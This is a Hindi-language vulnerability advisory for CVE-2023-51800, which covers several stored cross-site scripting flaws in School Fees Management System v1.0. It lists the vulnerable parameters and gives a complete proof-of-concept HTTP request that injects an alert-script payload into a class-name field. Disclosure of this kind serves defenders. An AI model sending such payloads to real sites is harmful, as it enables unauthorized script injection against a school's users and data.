
School Fees Management System v1.0 में कई क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरियाँ
विवरण: School Fees Management System v1.0 में एकाधिक क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरियाँ।
कमजोर उत्पाद संस्करण: School Fees Management System v1.0 CVE लेखक: Geraldo Alcântara दिनांक: 28/11/2023 पुष्टि तिथि: 10/12/2023 CVE: CVE-2023-51800 CVE लिंक: https://www.cve.org/CVERecord?id=CVE-2023-51800 NVD लिंक: https://nvd.nist.gov/vuln/detail/CVE-2023-51800 Tenable लिंक: https://www.tenable.com/cve/CVE-2023-51800 परीक्षण किया गया: Windows
कमजोरी का शोषण करने के लिए, एक प्रमाणित उपयोगकर्ता जिसके पास आवश्यक अनुमतियाँ हैं, उसे प्रभावित पृष्ठों में से किसी एक पर जाना होगा और एक संवेदनशील फ़ील्ड में एक दुर्भावनापूर्ण पेलोड इंजेक्ट करना होगा। प्रभावित घटक:
main_settings - phone, address, bank, acc_name, acc_number पैरामीटर, new_class - cname पैरामीटर, add_new_parent - name, email पैरामीटर, new_term - tname पैरामीटर, edit_student - name पैरामीटर
Request:
POST /ci_fms/admin/action/new_class HTTP/1.1
Host: 192.168.68.148
Content-Length: 273
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAbJT9XS9eFLU53MR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/management/class
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=gdoj5tr7rsf7ci5o9rpr0rh5eni2r6an
Connection: close
------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cname"
<script>alert(document.domain)</script>
------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cfees"
12,000
------WebKitFormBoundaryAbJT9XS9eFLU53MR--
खोजकर्ता/श्रेय: Geraldo Alcântara